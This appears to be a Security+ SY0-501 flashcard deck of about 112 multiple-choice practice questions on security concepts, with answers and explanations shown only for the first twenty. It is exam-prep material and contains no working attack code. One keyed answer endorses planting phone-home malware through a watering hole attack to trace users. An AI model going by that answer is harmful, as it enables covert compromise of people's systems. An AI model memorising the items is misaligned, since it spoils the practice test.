Security+ SYO-501 - Quiz Flashcards

1
Q
An attacker has decided to attempt to compromise your organization’s network. They have already determined the ISP you are using and know your public IP addresses. They have also performed port scanning to discover your open ports. What communications technique can the hacker now use to identify the applications that are running on each open port facing the Internet?
A.	Credentialed penetration test
B.	Intrusive vulnerability scan
C.	Banner grabbing
D.	Port scanning
A

Q1.1
C. Banner grabbing

C. Banner grabbing is the communications technique a hacker can use to identify the product that is running on an open port facing the Internet.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q
You are the security manager for a large organization. Your NIDS has reported abnormal levels of network activity and several systems have become unresponsive. While investigating the causes of these issues, you discover a rootkit on your mission-critical database server. What is the best step to take to return this system to production?
A.	Reconstitute the system.
B.	Run an antivirus tool.
C.	Install a HIDS.
D.	Apply vendor patches.
A

Q1.2
A. Reconstitute the system.

A. The only real option to return a system to a secure state after a rootkit is reconstitution

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
If user awareness is overlooked, what attack is more likely to succeed?
A.	Man-in-the-middle
B.	Reverse hash matching
C.	Physical intrusion
D.	Social engineering
A

Q1.3
D. Social engineering

D. Social engineering is more likely to occur if users aren’t properly trained to detect and prevent it. The lack of user awareness training won’t have as much impact on man-in-the-middle, reverse hash-matching, or physical intrusion attacks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
A pirated movie-sharing service is discovered operating on company equipment. Administrators do not know who planted the service or who the users are. What technique could be used to attempt to trace the identity of the users?
A.	Typo squatting
B.	Integer overflow
C.	Watering hole attack
D.	Ransomware
A

Q1.4
C. Watering hole attack

C. A watering hole attack could be used to plant phone-home-to-identity malware on the systems of subsequent visitors.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
You are the IT security manager for a retail merchant organization that is just going online with an e-commerce website. You hired several programmers to craft the code that is the backbone of your new web sales system. However, you are concerned that while the new code functions well, it might not be secure. You begin to review the code, systems design, and services architecture to track down issues and concerns. Which of the following do you hope to find in order to prevent or protect against XSS?
A.	Input validation
B.	Defensive coding
C.	Allowing script input
D.	Escaping metacharacters
A

Q1.5
A. Input validation
B. Defensive coding
D. Escaping metacharacters

A, B, and D. A programmer can implement the most effective way to prevent XSS by validating input, coding defensively, escaping metacharacters, and rejecting all script-like input.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q
What type of virus attempts to disable security features that are focused on preventing malware infection?
A.	Retrovirus
B.	Polymorphic
C.	Companion
D.	Armored
A

Q1.6
A. Retrovirus

A. Retroviruses specifically target antivirus systems to render them useless.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q
What does the acronym RAT stand for?
A.	Random Access Token
B.	Remote Authentication Testing
C.	Random Authorization Trajectory
D.	Remote Access Trojan
A

Q1.7
D. Remote Access Trojan

D. A RAT is a remote access Trojan. A RAT is a form of malicious code that grants an attacker some level of remote control access to a compromised system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q
What form of social engineering attack focuses on stealing credentials or identity information from any potential target?
A.	Phishing
B.	Tailgating
C.	Dumpster diving
D.	Logic bomb
A

Q1.8
A. Phishing

A. Phishing is a form of social engineering attack focused on stealing credentials or identity information from any potential target. It is based on the concept of fishing for information. Phishing is employed by attackers to obtain sensitive information such as usernames, passwords, credit card details, or other personally identifiable information by masquerading as a trustworthy entity (a bank, a service provider, or a merchant, for example) in electronic communication (usually email).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q
What type of service attack positions the attacker in the communication path between a client and a server?
A.	Session hijacking
B.	Man-in-the-middle
C.	Amplification
D.	Replay
A

Q1.9
B. Man-in-the-middle

B. A man-in-the-middle attack is a communications eavesdropping attack. Attackers position themselves in the communication stream between a client and server (or any two communicating entities). The client and server believe that they’re communicating directly with each other—they may even have secured or encrypted communication links.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
What form of attack abuses a program’s lack of length limitation on the data it receives before storing the input in memory and can lead to arbitrary code execution?
A.	ARP poisoning
B.	XSS
C.	Domain hijacking
D.	Buffer overflow
A

Q1.10
D. Buffer overflow

D. A buffer overflow attack occurs when an attacker submits data to a process that is larger than the input variable is able to contain. Unless the program is properly coded to handle excess input, the extra data is dropped into the system’s execution stack and may execute as a fully privileged operation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q
What is a programmatic activity that restricts or reorganizes software code without changing its externally perceived behavior or produced results?
A.	Buffer overflow
B.	Pass the hash
C.	Refactoring
D.	Shimming
A

Q.1.11
C. Refactoring

C. Refactoring is restricting or reorganizing software code without changing its externally perceived behavior or produced results. Refactoring focuses on improving software’s nonfunctional elements (quality attributes, nonbehavioral requirements, service requirements, or constraints). Refactoring can improve readability, reduce complexity, ease troubleshooting, and simplify future expansion and extension efforts.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q
What wireless attack is able to trick mobile device users into connecting into its man-in-the-middle style of attack by automatically appearing as if it is a trusted network that they have connected to in the past?
A.	Replay
B.	Evil twin
C.	Bluesnarfing
D.	Disassociation
A

Q1.12
B. Evil twin

B. Evil twin is an attack where a hacker operates a false access point that will automatically clone or twin the identity of an access point based on a client device’s request to connect. Each time a device successfully connects to a wireless network, it retains a wireless profile in its history.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
What type of hacker hacks for a cause or purpose, knowing that they may be identified, apprehended, and prosecuted?
A.	Hacktivist
B.	Script kiddie
C.	Nation-state hacker
D.	Internal attacker
A

Q1.13
A. Hacktivist

A. A hacktivist is someone who uses their hacking skills for a cause or purpose. A hacktivist commits criminal activities for the furtherance of their cause. A hacktivist attacks targets even when they know they will be identified, apprehended, and prosecuted. They do this because they believe their purpose or cause is more important than themselves.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q
When an attacker selects a target, they must perform reconnaissance to learn as much as possible about the systems and their configuration before launching attacks. What is the term for the gathering of information from any publicly available resource, such as websites, social networks, discussion forums, file services, and public databases?
A.	Banner grabbing
B.	Port scanning
C.	Open-source intelligence
D.	Enumeration
A

Q1.14
C. Open-source intelligence

C. Open source intelligence is the gathering of information from any publicly available resource. This includes websites, social networks, discussion forums, file services, public databases, and other online sources. This also includes non-Internet sources, such as libraries and periodicals.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q
What penetration testing or hacking term refers to the concept of continuing an intrusion after an initial compromise in order to further breach an organization by focusing on new targets that may not have been accessible initially?
A.	Man-in-the-browser
B.	Pivot
C.	Daisy chaining
D.	Shimming
A

Q1.15
B. Pivot

B. In penetration testing (or hacking in general), a pivot is the action or ability to compromise a system, then using the privileges or accessed gained through the attack to focus attention on another target that may not have been visible or exploitable initially. It is the ability to adjust the focus or the target of an intrusion after an initial foothold is gained.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q
What is the term for an attack or exploit that grants the attacker greater privileges, permissions, or access than what may have been achieved by the initial exploitation?
A.	Hoax
B.	Impersonation
C.	Piggybacking
D.	Privilege escalation
A

Q1.16
D. Privilege escalation

D. Privilege escalation is an attack or exploit that grants the attacker greater privileges, permissions, or access than may have been achieved by the initial exploitation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q
What type of information-gathering tactics rely on direct interaction with the target while attempting to avoid being detected as malicious?
A.	Passive reconnaissance
B.	Banner grabbing
C.	Active reconnaissance
D.	Social engineering
A

Q1.17
C. Active reconnaissance

C. Active reconnaissance is the idea of collecting information about a target through interactive means. By directly interacting with a target, the attacker can collect accurate and detailed information quickly but at the expense of potentially being identified as an attacker rather than just an innocent, benign, random visitor.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q
What type of test of security controls is performed with an automated vulnerability scanner that seeks to identify weaknesses while listening in on network communications?
A.	Active
B.	Passive
C.	External
D.	Noncredentialed
A

Q1.18
B. Passive

B. A passive test of security controls is being performed when an automated vulnerability scanner is being used that seeks to identify weaknesses while listening in on network communications.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q
What is the term used to describe systems that are no longer receiving updates and support from their vendors?
A.	Passive
B.	Embedded
C.	End-of-life
D.	Static
A

Q1.19
C. End-of-life

C. End-of-life systems are those that are no longer receiving updates and support from their vendor. If an organization continues to use an end-of-life system, the risk of compromise is high because any future exploitation will never be patched or fixed. It is of utmost important to move off end-of-life systems in order to maintain a secure environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q
What is present on a system for ease of installation and initial configuration in order to minimize support calls from new customers?
A.	Default configuration
B.	Resource exhaustion trigger
C.	Buffer overflow flaw
D.	Collision tool
A

Q1.20
A. Default configuration

A. Default configurations should never be allowed to remain on a device or within an application. Defaults are such for ease of installation and initial configuration in order to minimize support calls from new customers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

You are implanting a new network for a small office environment. The network includes a domain controller, four resource servers, a network printer, a wireless access point, and three dozen client systems. In addition to standard network management devices, such as switches and routers, why would you want to deploy a firewall?
A. To watch for intrusions
B. To control traffic entering and leaving a network
C. To require strong passwords
D. To prevent misuse of company resources

A

Q2.01

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

As the security administrator for a moderate-sized network, you need to deploy security solutions to reduce the risk of a security breach. You elect to install a network-based IDS. However, after deployment you discover that the NIDS is not suitable for detecting which of the following?
A. Email spoofing
B. Denial-of-service attacks
C. Attacks against the network
D. Attacks against an environment that produces significant traffic

A

Q2.02

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q
Illegal or unauthorized zone transfers are a significant and direct threat to what type of network server?
A.	Web
B.	DHCP
C.	DNS
D.	Database
A

Q2.03

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q
What mechanism of loop protection is based on an element in a protocol header?
A.	Spanning Tree Protocol
B.	Ports
C.	Time to live
D.	Distance vector protocols
A

Q2.04

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q
What type of wireless antenna can be used to send or receive signals in any direction?
A.	Cantenna
B.	Yagi
C.	Rubber duck
D.	Panel
A

Q2.05

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q
What mechanism of wireless security is based on AES?
A.	TKIP
B.	CCMP
C.	LEAP
D.	WEP
A

Q2.06

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q
What technology provides an organization with the best control over BYOD equipment?
A.	Encrypted removable storage
B.	Mobile device management
C.	Geotagging
D.	Application whitelisting
A

Q2.07

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

What is the most effective means to reduce the risk of losing the data on a mobile device, such as a notebook computer?
A. Encrypt the hard drive.
B. Minimize sensitive data stored on the mobile device.
C. Use a cable lock.
D. Define a strong logon password.

A

Q2.08

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q
Which security stance will be most successful at preventing malicious software execution?
A.	Deny by exception
B.	Whitelisting
C.	Allow by default
D.	Blacklisting
A

Q2.09

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q
LDAP operates over what TCP ports?
A.	636 and 389
B.	110 and 25
C.	443 and 80
D.	20 and 21
A

Q2.10

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q
What type of NAC agent is written in a web or mobile language and is temporarily executed on a system only when the specific management page is accessed?
A.	Permanent
B.	Dissolvable
C.	Passive
D.	Stateless
A

Q2.11

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

What is the purpose or use of a media gateway?
A. It is a fictitious environment designed to fool attackers and intruders and lure them away from the private secured network.
B. It is used to connect several network segments and enable traffic from one network segment to traverse into another network segment.
C. It is used to spread or distribute network traffic load across several network links or network devices.
D. It is any device or service that converts data from one communication format to another.

A

Q2.12

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

Which of the following is true regarding an exploitation framework? (Select all that apply.)
A. Is a passive scanner
B. Fully exploits vulnerabilities
C. Only operates in an automated fashion
D. Allows for customization of test elements
E. Represents additional risk to the environment
F. Can only assess systems over IPv4

A

Q2.13

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

What is the purpose of a banner grabbing activity?
A. Detecting the presence of a wireless network
B. Capturing the initial response or welcome message from a network service that may directly or indirectly reveal its identity
C. Preventing access to a network until the client has accepted use terms or fully authenticated
D. Altering the source IP address of an outbound request

A

Q2.14

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

How are effective permissions determined or calculated?
A. Accumulate allows, remove any denials
B. Count the number of users listed in the ACL
C. View the last access time stamp of the asset
D. Review the user’s group memberships

A

Q2.15

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

What is a content filter mechanism that can reduce the possibility of malicious executable code being accepted as input?
A. Checking length
B. Blocking hex characters
C. Escaping metacharacters
D. Filtering on known patterns of malicious content

A

Q2.16

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q
What is an example of a PUP?
A.	A backdoor
B.	Unwanted marketing pop-ups
C.	A Trojan horse
D.	A password cracker
A

Q2.17

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q
What is the purpose of DEP being present in an operating system?
A.	To block buffer overflows
B.	To prevent social-engineering attacks
C.	To stop ransomware infections
D.	To interrupt backdoor installations
A

Q2.18

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q
What is the term used to describe the designation of a specific geographical area that is then used to implement features on mobile devices, which can be defined by GPS coordinates, a wireless indoor positioning system (IPS), or the presence or lack of a specific wireless signal?
A.	Bluesmacking
B.	Geofencing
C.	Banner grabbing
D.	CYOD
A

Q2.19

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

What is the definition of DNSSEC?
A. It is an Internet standard for encrypting and digitally signing email.
B. It can be used as a secure Telnet replacement, it can be used to encrypt protocols similar to TLS, and it can be used as a VPN protocol.
C. It is a standard network-management protocol supported by most network devices and TCP/IP-compliant hosts used to obtain status information, performance data, statistics, and configuration details.
D. It is a security improvement to the existing name resolution infrastructure. The primary function of this tool is to provide reliable authentication between devices when performing resolution operations.

A

Q2.20

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q
Which of the following allows the deployment of a publicly accessible web server without compromising the security of the private network?
A.	Intranet
B.	DMZ
C.	Extranet
D.	Switch
A

Q3.01

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q
An organization has a high-speed fiber Internet connection that it uses for most of its daily operations, as well as its offsite backup operations. This represents what security problem?
A.	Single point of failure
B.	Redundant connections
C.	Backup generator
D.	Offsite backup storage
A

Q3.02

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

A security template can be used to perform all but which of the following tasks?
A. Capture the security configuration of a master system
B. Apply security settings to a target system
C. Return a target system to its precompromised state
D. Evaluate compliance with security of a target system

A

Q3.03

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q
What technique or method can be employed by hackers and researchers to discover unknown flaws or errors in software?
A.	Dictionary attacks
B.	Fuzzing
C.	War dialing
D.	Cross-site request forgery
A

Q3.04

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

What is a security risk of an embedded system that is not commonly found in a standard PC?
A. Power loss
B. Access to the Internet
C. Control of a mechanism in the physical world
D. Software flaws

A

Q3.05

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

To ensure that whole-drive encryption provides the best security possible, which of the following should not be performed?
A. Screen lock the system overnight.
B. Require a boot password to unlock the drive.
C. Lock the system in a safe when it is not in use.
D. Power down the system after use.

A

Q3.06

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q
In order to avoid creating a monolithic security structure, organizations should adopt a wide range of security mechanisms. This concept is known as \_\_\_\_\_\_\_\_\_\_.
A.	Defense in depth
B.	Control diversity
C.	Intranet buffering
D.	Sandboxing
A

Q3.07

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q
When offering a resource to public users, what means of deployment provides the most protection for a private network?
A.	Intranet
B.	Wireless
C.	Honeynet
D.	DMZ
A

Q3.08

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q
When you are implementing a security monitoring system, what element is deployed in order to detect and record activities and events?
A.	Correlation engine
B.	Tap
C.	Sensor
D.	Aggregation switch
A

Q3.09

50
Q
When an enterprise is using numerous guest OSs to operate their primary business operations, what tool or technique can be used to enable communications between guest OSs hosted on different server hardware but keep those communications distinct from standard subnet communications?
A.	VPN
B.	SDN
C.	EMP
D.	FDE
A

Q3.10

51
Q
What type of OS is designed for public end-user access and is locked down so that only preauthorized software products and functions are enabled?
A.	Kiosk
B.	Appliance
C.	Mobile
D.	Workstation
A

Q3.11

52
Q
When you need to test new software whose origin and supply chain are unknown or untrusted, what tool can you use to minimize the risk to your network or workstation?
A.	Hardware security module
B.	UEFI
C.	Sandboxing
D.	SDN
A

Q3.12

53
Q
What is the concept of a computer implemented as part of a larger system that is typically designed around a limited set of specific functions (such as management, monitoring, and control) in relation to the larger product of which it’s a component?
A.	IoT
B.	Application appliance
C.	SoC
D.	Embedded system
A

Q3.13

54
Q
What is an industrial control system (ICS) that provides computer management and control over industrial processes and machines?
A.	SCADA
B.	HSM
C.	OCSP
D.	MFD
A

Q3.14

55
Q
Which SDLC model is based around adaptive development where focusing on a working product and fulfilling customer needs is prioritized over rigid adherence to a process, use of specific tools, and detailed documentation?
A.	Waterfall
B.	Agile
C.	Spiral
D.	Ad hoc
A

Q3.15

56
Q
When an organization wishes to automate many elements and functions of IT management, such as development, operations, security, and quality assurance, they are likely to be implementing which of the following?
A.	SCADA
B.	UTM
C.	IaaS
D.	DevOps
A

Q3.16

57
Q
What is not a cloud security benefit or protection?
A.	CASB
B.	SECaaS
C.	VM sprawl
D.	VM isolation
A

Q3.17

58
Q
What form of cloud service provides the customer with the ability to run their own custom code but does not require that they manage the execution environment or operating system?
A.	SaaS
B.	PaaS
C.	IaaS
D.	SECaaS
A

Q3.18

59
Q
What recovery mechanism is used to return a system back to a previously operating condition when a new software install corrupts the operating system?
A.	Revert to known state
B.	Roll back to known configuration
C.	Live boot media
D.	Template
A

Q3.19

60
Q
What type of security mechanism can be used to prevent a vehicle from damaging a facility?
A.	Fencing
B.	Lighting
C.	Bollard
D.	Access cards
A

Q3.20

61
Q
What method of access control is best suited for environments with a high rate of employee turnover?
A.	MAC
B.	DAC
C.	RBAC
D.	ACL
A

Q4.01

62
Q
What mechanism is used to support the exchange of authentication and authorization details between systems, services, and devices?
A.	Biometric
B.	Two-factor authentication
C.	SAML
D.	LDAP
A

Q4.02

63
Q
Which is the strongest form of password?
A.	More than eight characters
B.	One-time use
C.	Static
D.	Different types of keyboard characters
A

Q4.03

64
Q
Which of the following technologies can be used to add an additional layer of protection between a directory services–based network and remote clients?
A.	SMTP
B.	RADIUS
C.	PGP
D.	VLAN
A

Q4.04

65
Q

Which of the following is not a benefit of single sign-on?
A. The ability to browse multiple systems
B. Fewer usernames and passwords to memorize
C. More granular access control
D. Stronger passwords

A

Q4.05

66
Q
Federation is a means to accomplish \_\_\_\_\_\_\_.
A.	Accountability logging
B.	ACL verification
C.	Single sign-on
D.	Trusted OS hardening
A

Q4.06

67
Q
You have been tasked with installing new kiosk systems for use in the retail area of your company’s store. The company elected to use standard equipment and an open-source Linux operating system. You are concerned that everyone will know the default password for the root account. What aspect of the kiosk should be adjusted to prevent unauthorized entities from being able to make system changes?
A.	Authorization
B.	Accounting
C.	Authentication
D.	Auditing
A

Q4.07

68
Q
Your company has several shifts of workers. Overtime and changing shifts is prohibited due to the nature of the data and the requirements of the contract. To ensure that workers are able to log into the IT system only during their assigned shifts, you should implement what type of control?
A.	Multifactor authentication
B.	Time-of-day restrictions
C.	Location restrictions
D.	Single sign-on
A

Q4.08

69
Q

Place the following steps (represented by the letters A through I) in the correct order:
A. The KDC verifies that the client has a valid TGT and then issues an ST to the client. The ST includes a time stamp that indicates its valid lifetime.
B. The client receives the TGT. At this point, the subject is an authenticated principle in the Kerberos realm.
C. The client sends the ST to the network server that hosts the desired resource.
D. The Kerberos client system encrypts the password and transmits the protected credentials to the KDC.
E. The subject requests access to resources on a network server. This causes the client to request a service ticket (ST) from the KDC.
F. The subject provides logon credentials.
G. The network server verifies the ST. If it’s verified, it initiates a communication session with the client. From this point forward, Kerberos is no longer involved.
H. The KDC verifies the credentials and then creates a ticket-granting ticket (TGT)—a hashed form of the subject’s password with the addition of a time stamp that indicates a valid lifetime. The TGT is encrypted and sent to the client.
I. The client receives the ST.
1. F, D, H, B, E, A, I, C, G
2. H, I, C, D, G, F, E, A, B
3. A, B, C, D, E, F, G, H, I
4. I, A, E, B, C, G, F, H, D

A

Q4.09

70
Q
Your company has recently purchased Cisco networking equipment. When you are setting up to allow remote access, what means of AAA service is now available to your organization?
A.	RADIUS
B.	X.500
C.	TACACS+
D.	X.509 v3
A

Q4.10

71
Q
Your organization has recently decided to allow some employees to work from home two days a week. While configuring the network to allow for remote access, you realize the risk this poses to the organization’s infrastructure. What mechanism can be implemented to provide an additional barrier against remote access abuse?
A.	Kerberos
B.	Single sign-on
C.	Stronger authorization
D.	RADIUS
A

Q4.11

72
Q
You are developing a smart app that will control a new IoT device that automates blinking light fixtures in time with the beat of music. You want to make using the device as simple as possible, so you want to adopt an authentication technique that is seamless for the user. Which technology should you integrate into your app and device?
A.	OpenID Connect
B.	Shibboleth
C.	A secure token
D.	Role-based access control
A

Q4.12

73
Q

How are effective permissions calculated?
A. Count the number of allows, subtract the number of denials
B. Accumulate allows, remove denials
C. Look at the user’s clearance level
D. Count the number of groups the user is a member of

A

Q4.13

74
Q
What form of authorization is based on a scheme of characteristics related to the user, the object, the system, the application, the network, the service, time of day, or even other subjective environmental concerns?
A.	RBAC
B.	MAC
C.	DAC
D.	ABAC
A

Q4.14

75
Q
Your organization wants to integrate a biometric factor into the existing multifactor authentication system. To ensure alignment with company priorities, what tool should be used in selecting which type or form of biometric to use?
A.	CER comparison
B.	OAuth verifier
C.	Zephyr analysis chart
D.	Federation assessment
A

Q4.15

76
Q
What type of biometric error increases as the sensitivity of the device increases?
A.	FAR
B.	FRR
C.	CER
D.	False positive
A

Q4.16

77
Q
You are installing a new network service application. The application requires a variety of permissions on several resources and even a few advanced user rights in order to operate properly. Which type of account should be created for this application to operate under?
A.	Service
B.	User
C.	Privileged
D.	Generic
A

Q4.17

78
Q
Failing to perform regular permissions auditing can result in a violation of what security concept?
A.	Implicit deny
B.	Security by obscurity
C.	Least privilege
D.	Diversity of defense
A

Q4.18

79
Q
What type of access management can involve restrictions based on MAC address, IP address, OS version, patch level, and/or subnet in addition to logical or geographical position?
A.	Geography-based access control
B.	Physical access control
C.	Logical access control
D.	Location-based access control
A

Q4.19

80
Q

Which of the following is a recommended basis for reliable password complexity?
A. Minimum of eight characters; include representations of at least three of the four character types
B. Allow for a maximum of three failed logon attempts before locking the account for 15 minutes
C. Require that a password remain static for at least three days and prevent the reuse of the five most recently used passwords
D. Require that each administrator have a normal user account in addition to a privileged account

A

Q4.20

81
Q
Which of the following risk assessment formulas represents the total potential loss a company may experience within a single year due to a specific risk to an asset?
A.	EF
B.	SLE
C.	ARO
D.	ALE
A

Q5.01

82
Q
Which of the following is more formal than a handshake agreement but not a legal binding contract?
A.	SLA
B.	BIA
C.	DLP
D.	MOU
A

Q5.02

83
Q
When a user signs a(n) \_\_\_\_\_\_\_\_\_, it’s a form of consent to the monitoring and auditing processes used by the organization.
A.	Acceptable use policy
B.	Privacy policy
C.	Separation of duties policy
D.	Code of ethics policy
A

Q5.03

84
Q

When is business continuity needed?
A. When new software is distributed
B. When business processes are interrupted
C. When a user steals company data
D. When business processes are threatened

A

Q5.04

85
Q

You run a full backup every Monday. You also run a differential backup every other day of the week. You experience a drive failure on Friday. Which of the following restoration procedures should you use to restore data to the replacement drive?
A. Restore the full backup and then each differential backup.
B. Restore the full backup and then the last differential backup.
C. Restore the differential backup.
D. Restore the full backup.

A

Q5.05

86
Q
Which of the following is a security control type that is not usually associated with or assigned to a security guard?
A.	Preventive
B.	Detective
C.	Corrective
D.	Administrative
A

Q5.06

87
Q
You are the security manager for a brokerage firm. New company policy requires that all administrators be evaluated for compliance or violations in regard to adherence to the security policy and ethics agreement. Which of the following is a technique that can be used to accomplish this task?
A.	Separation of duties
B.	Clean desk
C.	Background checks
D.	Mandatory vacations
A

Q5.07

88
Q
Separation of duties has recently been implemented at your organization. Due to the size of the company, a single person has been assigned to each compartmented management area. There is some concern that over time the company will be at risk of being unable to perform critical tasks if one or more administrators are unavailable due to illness, vacation, retirement, or termination. What tool can be used to reduce this risk?
A.	Job rotation
B.	Principle of least privilege
C.	Exit interviews
D.	Awareness training
A

Q5.08

89
Q
Downtime is a violation of availability. Avoiding downtime is an essential tenet of your organization’s mission and security policy. What element of system management and maintenance needs to be monitored and tracked in order to avoid device failure resulting in unplanned downtime?
A.	RTO
B.	MTTF
C.	ALE
D.	NDA
A

Q5.09

90
Q

You are the network manager for a large organization. Over the weekend a storm caused a power surge, which damaged the main router between the company network and the Internet service. On Monday morning you realize that the entire intranet is unable to connect to any outside resource and mission-critical tasks are not functioning. What is the problem that the organization is experiencing?
A. Sustained redundancy
B. Maintaining of availability
C. Load-balanced distribution of job tasks
D. A single point of failure

A

Q5.10

91
Q
What form of risk analysis can involve the Delphi technique, interviews, and focus groups?
A.	Quantitative
B.	Residual
C.	Qualitative
D.	Cost-benefit
A

Q5.11

92
Q
You are the security manager for a large organization. During the yearly risk management reassessment, a specific risk is being left as is. You thoroughly document the information regarding the risk, the related assets, and the potential consequences. What is this method of addressing risk known as?
A.	Mitigation
B.	Tolerance
C.	Assignment
D.	Ignoring
A

Q5.12

93
Q
What type of security policy or plan has the following main phases: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned?
A.	IRP
B.	BCP
C.	DRP
D.	BPA
A

Q5.13

94
Q
In what phase of an incident response plan does the organization return to normal operations after handling a violating event?
A.	Containment
B.	Lessons Learned
C.	Recovery
D.	Eradication
A

Q5.14

95
Q
When an organization is sent a lawyer’s letter demanding that they retain specific records, logs, and other files pertaining to suspected illegal activity, what is this known as?
A.	Audit
B.	Forensics
C.	Investigation
D.	Legal hold
A

Q5.15

96
Q

Which of the following are important elements in gathering data from storage devices related to a suspect’s system during a forensic investigation? (Select all that apply.)
A. Calculating a hash of the original storage device
B. Creating bitstream copy clones of the original
C. Using read-block adapters
D. Removing the storage device from the suspect’s system

A

Q5.16

97
Q
What is the main goal of BCP?
A.	Recover from disasters
B.	Minimize the impact of a disruptive event
C.	Keep costs to a minimum
D.	Prevent intrusions
A

Q5.17

98
Q
What form of alternate processing facility is a reliable means of recovery but is not usually considered to be cost effective?
A.	Warm
B.	Cold
C.	Onsite
D.	Hot
A

Q5.18

99
Q

A corrective control is used for what purpose?
A. To thwart or stop unwanted or unauthorized activity from occurring
B. To discover or detect unwanted or unauthorized activity
C. To modify the environment to return systems to normal after an unwanted or unauthorized activity has occurred
D. To provide various options to other existing controls to aid in enforcement and support of security policies

A

Q5.19

100
Q
Which of the following may be considered protected health information? (Select all that apply.)
A.	Phone numbers
B.	Medical record numbers
C.	Email address
D.	Vehicle identifiers
E.	Web URLs
F.	IP address numbers
G.	Biometric identifiers
H.	Photographic images
A

Q5.20

101
Q
Which of the following is most directly associated with providing or supporting perfect forward secrecy?
A.	PBKDF2
B.	ECDHE
C.	HMAC
D.	OCSP
A

Q6.01

102
Q
Which of the following symmetric-encryption algorithms offers the strength of 168-bit keys?
A.	Data Encryption Standard
B.	Advanced Encryption Standard
C.	Triple DES
D.	IDEA
A

Q6.02

103
Q
The security service that protects the secrecy of data, information, or resources is known as what?
A.	Integrity
B.	Authentication
C.	Nonrepudiation
D.	Confidentiality
A

Q6.03

104
Q
Digital signatures can be created using all but which of the following?
A.	Asymmetric cryptography
B.	Hashing
C.	Key escrow
D.	Symmetric cryptography
A

Q6.04

105
Q
When a subject or end user requests a certificate, they must provide which of the following items? (Choose all that apply.)
A.	Proof of identity
B.	A hardware storage device
C.	A public key
D.	A private key
A

Q6.05

106
Q
From a private corporate perspective, which of the following is most secure?
A.	Decentralized key management
B.	Centralized key management
C.	Individual key management
D.	Distributed key management
A

Q6.06

107
Q
When should a key or certificate be renewed?
A.	Every year
B.	Every quarter
C.	Just after it expires
D.	Just before it expires
A

Q6.07

108
Q
Which mode of operation used by symmetric encryption algorithms ensures unique cipher text by integrating an IV into the operation and linking each cipher text block to the next plain text block?
A.	Cipher Block Chaining
B.	Electronic Codebook
C.	Galois Counter Mode
D.	Counter Mode
A

Q6.08

109
Q
You are the communications officer for a large organization. Your data transfer system encrypts each file before sending it across the network to the recipient. There have been issues with the keys being intercepted as they are sent along the same path as the protect files. What alternative system should be used for key exchange?
A.	Ephemeral
B.	Out-of-band
C.	Sequential
D.	Synchronized
A

Q6.09

110
Q

Place the steps for creating a digital signature in correct order.
A. The receiver uses the sender’s public key to decrypt the sender’s private key and thus extract the hash from the digital signature.
B. The sender computes a hash of the message.
C. The complete message package is sent to the receiver.
D. The sender attaches the encrypted hash to the message.
E. The receiver computes a hash of the message.
F. The sender writes a message.
G. The receiver compares the two hash values.
H. The receiver strips off the encrypted hash (the digital signature).
I. The sender uses the sender’s private key to encrypt the hash.
1. H, G, E, B, D, F, A, C, I
2. F, I, G, A, D, H, C, B, E
3. C, A, E, I, B, D, G, H, F
4. F, B, I, D, C, H, A, E, G

A

Q6.10

111
Q
You are a programmer with a new app for use on smartphones. Your app provides users with a means to securely store personal data, such as their calendar, financial information, and personal contacts in an encrypted container. There is concern that users will be unable to remember a long random encryption key, but you want to use something stronger than just a remembered password. What technique can be used to minimize the information remembered by the user while maximizing the security of the encryption?
A.	Session key
B.	Ephemeral key
C.	Key stretching
D.	Secret algorithm
A

Q6.11

112
Q
What is the least effective form of security?
A.	Ephemeral keys
B.	Security through obscurity
C.	Implicit deny
D.	Authentication using certificates
A

Q6.12

113
Q
